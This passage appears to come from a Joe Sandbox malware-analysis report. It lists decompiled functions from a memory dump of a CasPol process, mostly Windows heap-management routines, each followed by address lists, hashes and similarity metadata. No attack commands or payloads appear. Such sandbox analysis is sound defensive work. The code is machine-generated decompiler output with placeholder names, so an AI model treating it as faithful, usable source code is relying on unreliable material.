								L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                        0x013c8a0a
                                                                        0x013c8a1c
                                                                        0x013c8a23
                                                                        0x013c8a2e
                                                                        0x013c8a30
                                                                        0x013c8a36
                                                                        0x013c8a3c
                                                                        0x013c8a3e
                                                                        0x013c8a4a
                                                                        0x013c8a52
                                                                        0x013c8a9c
                                                                        0x013c8aae
                                                                        0x013c8a58
                                                                        0x013c8a5e
                                                                        0x013c8a6a
                                                                        0x013c8a6f
                                                                        0x013c8a75
                                                                        0x013c8a7d
                                                                        0x013c8a85
                                                                        0x013c8a86
                                                                        0x013c8a89
                                                                        0x013c8a93
                                                                        0x013c8a99
                                                                        0x013c8a9b
                                                                        0x00000000
                                                                        0x013c8aaf
                                                                        0x013c8abe
                                                                        0x013c8ac3
                                                                        0x013c8acb
                                                                        0x013c8ad7
                                                                        0x013c8ae0
                                                                        0x013c8af1
                                                                        0x00000000
                                                                        0x013c8af1
                                                                        0x013c8acd
                                                                        0x013c8ad5
                                                                        0x013c8afb
                                                                        0x013c8afd
                                                                        0x013c8aff
                                                                        0x013c8b07
                                                                        0x013c8b22
                                                                        0x013c8b24
                                                                        0x013c8b2a
                                                                        0x013c8b2e
                                                                        0x013c8b3f
                                                                        0x013c8b78
                                                                        0x013c8b41
                                                                        0x013c8b52
                                                                        0x013c8b54
                                                                        0x013c8b5c
                                                                        0x013c8b74
                                                                        0x013c8b74
                                                                        0x013c8b5c
                                                                        0x013c8b3f
                                                                        0x013c8b5e
                                                                        0x013c8b61
                                                                        0x013c8b64
                                                                        0x013c8b64
                                                                        0x013c8b6c
                                                                        0x013c8b6c
                                                                        0x013c8b11
                                                                        0x01419cd5
                                                                        0x01419cd5
                                                                        0x013c8b17
                                                                        0x013c8b1a
                                                                        0x013c8b1a
                                                                        0x00000000
                                                                        0x013c8ad5
                                                                        0x013c8a89

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0f635229b03d736c765f72688eae0c0e2546c4c183433ad4c2ab578daf43fd10
                                                                        • Instruction ID: 4a982d31c0d4c4054586291c7b1d92e8451ec9b9d9bfcbee4ef4365021fa4228
                                                                        • Opcode Fuzzy Hash: 0f635229b03d736c765f72688eae0c0e2546c4c183433ad4c2ab578daf43fd10
                                                                        • Instruction Fuzzy Hash: 554152B5A0022D9BDB24DF5DCC88AAAB7F8EB54708F1045EED91997252E7709E80CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0147AA16 Relevance: .1, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0147AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0147ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0147AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0147AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0145CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L013D77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E013D7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0147131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0145CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                                        0x0147aa1f
                                                                        0x0147aa21
                                                                        0x0147aa23
                                                                        0x0147aa2b
                                                                        0x0147aa30
                                                                        0x0147aa36
                                                                        0x0147aa39
                                                                        0x0147aa42
                                                                        0x0147aa75
                                                                        0x0147aa7a
                                                                        0x0147aa7c
                                                                        0x0147aa7c
                                                                        0x0147aa88
                                                                        0x0147aa8a
                                                                        0x0147aa8f
                                                                        0x0147ab02
                                                                        0x0147ab04
                                                                        0x0147aa99
                                                                        0x0147aaa8
                                                                        0x0147aaaf
                                                                        0x0147aab3
                                                                        0x0147aacc
                                                                        0x0147aad1
                                                                        0x0147aad6
                                                                        0x0147aae0
                                                                        0x0147aaf3
                                                                        0x0147aaf9
                                                                        0x0147aafe
                                                                        0x0147aafe
                                                                        0x0147aaf3
                                                                        0x0147aad6
                                                                        0x0147aab3
                                                                        0x0147ab07
                                                                        0x0147ab0a
                                                                        0x0147ab11
                                                                        0x0147ab23
                                                                        0x0147ab13
                                                                        0x0147ab1c
                                                                        0x0147ab1c
                                                                        0x0147ab2b
                                                                        0x0147ab44
                                                                        0x0147ab44
                                                                        0x0147ab51
                                                                        0x0147ab51
                                                                        0x0147aa44
                                                                        0x0147aa47
                                                                        0x0147aa4c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147aa5a
                                                                        0x0147aa64
                                                                        0x0147aa72
                                                                        0x00000000
                                                                        0x0147aa66
                                                                        0x0147aa66
                                                                        0x0147aa68
                                                                        0x0147aa6a
                                                                        0x00000000
                                                                        0x0147aa6a

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                        • Instruction ID: 8dd1c2dccf21b6fcfdf1e50d73daf0b80d599cccf62e9693a2840e742921eafc
                                                                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                        • Instruction Fuzzy Hash: 4731D332B002056BEB15DB69C845BFFFBAAEF94210F29446AEA05A73A1DA749D01C750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014822AE Relevance: .1, Instructions: 116COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E014822AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				signed char _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				unsigned int* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E014821E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x139ac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x139ac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x139ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x139ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x139ac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x139ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x139ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x139ac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x14a6110; // 0x6fc0a953
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x14a6110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							E013CFFB0(_t77, _t114, _t114);
						}
						_t63 = E01482FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E013D2280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}




















                                                                        0x014822b9
                                                                        0x014822c2
                                                                        0x014822c6
                                                                        0x014822c8
                                                                        0x014822d8
                                                                        0x014822e2
                                                                        0x01482303
                                                                        0x01482314
                                                                        0x01482321
                                                                        0x0148234a
                                                                        0x0148235b
                                                                        0x0148236c
                                                                        0x01482372
                                                                        0x01482376
                                                                        0x0148238f
                                                                        0x0148238f
                                                                        0x014823b4
                                                                        0x014823c6
                                                                        0x014823c9
                                                                        0x014823cc
                                                                        0x014823cf
                                                                        0x014823cf
                                                                        0x014823e9
                                                                        0x014823ee
                                                                        0x014823f8
                                                                        0x014823fb
                                                                        0x014823fb
                                                                        0x01482403
                                                                        0x0148240a
                                                                        0x01482378
                                                                        0x0148237b
                                                                        0x01482381
                                                                        0x01482385
                                                                        0x01482385
                                                                        0x0148238d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148238d
                                                                        0x01482376
                                                                        0x01482417

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 55b4bc972d6c3551588184e63fd6ad45df765faf433aa75c1beff97a5d434155
                                                                        • Instruction ID: 6332990823356113bd5a033e599f3803d98e1a6ef33dbf04bba3fd2b38a725a5
                                                                        • Opcode Fuzzy Hash: 55b4bc972d6c3551588184e63fd6ad45df765faf433aa75c1beff97a5d434155
                                                                        • Instruction Fuzzy Hash: 8B4103711043524BCB08DF29C8A597FBBE0EF95225F05465EF4D5CB2D2CA34D809DBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0147FDE2 Relevance: .1, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 76%
                                                                        			E0147FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0147FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01480A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E013D7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01471608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01482B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0147C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0147DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E013D7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0147A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                        0x0147fde7
                                                                        0x0147fde8
                                                                        0x0147fdec
                                                                        0x0147fdee
                                                                        0x0147fdf5
                                                                        0x0147fdf7
                                                                        0x0147fdfc
                                                                        0x0147fe19
                                                                        0x0147fe22
                                                                        0x0147fe26
                                                                        0x0147fec6
                                                                        0x0147fecd
                                                                        0x0147fed5
                                                                        0x0147fee7
                                                                        0x0147fed7
                                                                        0x0147fee0
                                                                        0x0147fee0
                                                                        0x0147feef
                                                                        0x0147ff00
                                                                        0x0147ff02
                                                                        0x0147ff07
                                                                        0x0147ff07
                                                                        0x00000000
                                                                        0x0147feef
                                                                        0x0147fe33
                                                                        0x0147fe55
                                                                        0x0147fe59
                                                                        0x0147fe5b
                                                                        0x0147fe5e
                                                                        0x0147fe69
                                                                        0x0147fe6d
                                                                        0x0147fe6d
                                                                        0x0147fe69
                                                                        0x0147fe35
                                                                        0x0147fe41
                                                                        0x0147fe41
                                                                        0x0147fe79
                                                                        0x0147fe8b
                                                                        0x0147fe7b
                                                                        0x0147fe84
                                                                        0x0147fe84
                                                                        0x0147fe93
                                                                        0x00000000
                                                                        0x0147fea8
                                                                        0x0147feba
                                                                        0x00000000
                                                                        0x0147feba
                                                                        0x0147fdfe
                                                                        0x0147fe01
                                                                        0x0147fe02
                                                                        0x0147fe08
                                                                        0x0147ff0c
                                                                        0x0147ff14
                                                                        0x0147ff14

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                        • Instruction ID: 26a861bbb8458fbabbb55bb37f456697d93c1f728f1ddfadbdf5f0caa1332bd2
                                                                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                        • Instruction Fuzzy Hash: B23148323006416FD3229B7CC854FABBBA9EBD5A50F18485BEA568B362DA70DC45C760
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014820A8 Relevance: .1, Instructions: 114COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E014820A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x14a6110; // 0x6fc0a953
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x14a6110; // 0x6fc0a953
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						E01482E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x14a6110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						E01482E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x14a6110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							E01482E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x14a6110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x14a6110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}





















                                                                        0x014820a8
                                                                        0x014820b0
                                                                        0x014820b6
                                                                        0x014820ba
                                                                        0x014820be
                                                                        0x014820c4
                                                                        0x014820cb
                                                                        0x014820db
                                                                        0x014820e4
                                                                        0x014820e7
                                                                        0x014820e9
                                                                        0x014820ef
                                                                        0x014820f1
                                                                        0x014820fe
                                                                        0x01482102
                                                                        0x01482105
                                                                        0x01482105
                                                                        0x01482107
                                                                        0x0148210d
                                                                        0x01482112
                                                                        0x01482115
                                                                        0x01482120
                                                                        0x01482120
                                                                        0x01482107
                                                                        0x01482126
                                                                        0x01482131
                                                                        0x01482133
                                                                        0x0148213e
                                                                        0x0148213e
                                                                        0x01482140
                                                                        0x01482146
                                                                        0x0148214b
                                                                        0x01482156
                                                                        0x01482156
                                                                        0x01482140
                                                                        0x0148215f
                                                                        0x01482165
                                                                        0x01482170
                                                                        0x01482172
                                                                        0x0148217d
                                                                        0x0148217d
                                                                        0x0148217f
                                                                        0x01482185
                                                                        0x01482192
                                                                        0x01482192
                                                                        0x0148217f
                                                                        0x01482170
                                                                        0x01482197
                                                                        0x01482199
                                                                        0x014821a1
                                                                        0x014821b1
                                                                        0x014821bf
                                                                        0x014821d6
                                                                        0x014821d6
                                                                        0x014821bf
                                                                        0x014821dd
                                                                        0x014821e5

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d4e50941340d2cb9970640c7690f46169463f251309cc1fb1254a5fb72a6904a
                                                                        • Instruction ID: da37890a0e276c7d62f4b8dc0ee5efcc70d16aabaccab37b87af5e353b92ee10
                                                                        • Opcode Fuzzy Hash: d4e50941340d2cb9970640c7690f46169463f251309cc1fb1254a5fb72a6904a
                                                                        • Instruction Fuzzy Hash: 6E418233E1002A8BCB18DF68C49197EB7B1FB4830576A41BED915AB2A5DB74AD41CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01482D07 Relevance: .1, Instructions: 112COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E01482D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E014821E8(_a4, __edx,  &_v24,  &_v20);
				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x139ac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x139ac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x139ac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x139ac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x139ac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x139ac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x139ac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x139ac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x14a6110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x14a6110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x14a6110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E013CB090(_v24, _t91, _v12, _t29);
			}
























                                                                        0x01482d1f
                                                                        0x01482d2c
                                                                        0x01482d31
                                                                        0x01482d33
                                                                        0x01482d42
                                                                        0x01482d4b
                                                                        0x01482d51
                                                                        0x01482d5d
                                                                        0x01482d62
                                                                        0x01482d6e
                                                                        0x01482d71
                                                                        0x01482d7d
                                                                        0x01482d87
                                                                        0x01482d8d
                                                                        0x01482d91
                                                                        0x01482da5
                                                                        0x01482db7
                                                                        0x01482dc8
                                                                        0x01482dcf
                                                                        0x01482dd1
                                                                        0x01482dd3
                                                                        0x01482dd6
                                                                        0x01482ddb
                                                                        0x01482ddd
                                                                        0x00000000
                                                                        0x01482ddf
                                                                        0x01482df5
                                                                        0x01482e0e
                                                                        0x01482e12
                                                                        0x01482e1a
                                                                        0x01482e1c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01482e14
                                                                        0x01482e16
                                                                        0x01482e22
                                                                        0x01482e22
                                                                        0x01482e18
                                                                        0x01482e18
                                                                        0x00000000
                                                                        0x01482e18
                                                                        0x01482e16
                                                                        0x01482df7
                                                                        0x01482df7
                                                                        0x01482dfc
                                                                        0x01482e04
                                                                        0x01482e06
                                                                        0x01482e1e
                                                                        0x01482e1e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01482dfe
                                                                        0x01482e00
                                                                        0x01482e08
                                                                        0x01482e08
                                                                        0x01482e02
                                                                        0x01482e02
                                                                        0x00000000
                                                                        0x01482e02
                                                                        0x01482e00
                                                                        0x01482dfc
                                                                        0x00000000
                                                                        0x01482df5
                                                                        0x01482ddf
                                                                        0x01482e26
                                                                        0x01482e26
                                                                        0x01482e3c

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eb14eabd9e53bc8fa54b7eb904df3bd4ae5f055ae339b5ac9b3e28f718e16128
                                                                        • Instruction ID: ab1b1d6058804887a0016ae4edef6787d2615fe673c33bf78285bd0486063a18
                                                                        • Opcode Fuzzy Hash: eb14eabd9e53bc8fa54b7eb904df3bd4ae5f055ae339b5ac9b3e28f718e16128
                                                                        • Instruction Fuzzy Hash: 84412B315001A54BCB15DF69C4A0ABFBFF5FF45211B0A42ABE881DB2D2DA34D506DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0147EA55 Relevance: .1, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E0147EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E013D2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0147E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E013BF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E013CFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0147AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0147BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E013D7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0146FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E013CFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0147A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                        0x0147ea55
                                                                        0x0147ea66
                                                                        0x0147ea68
                                                                        0x0147ea6c
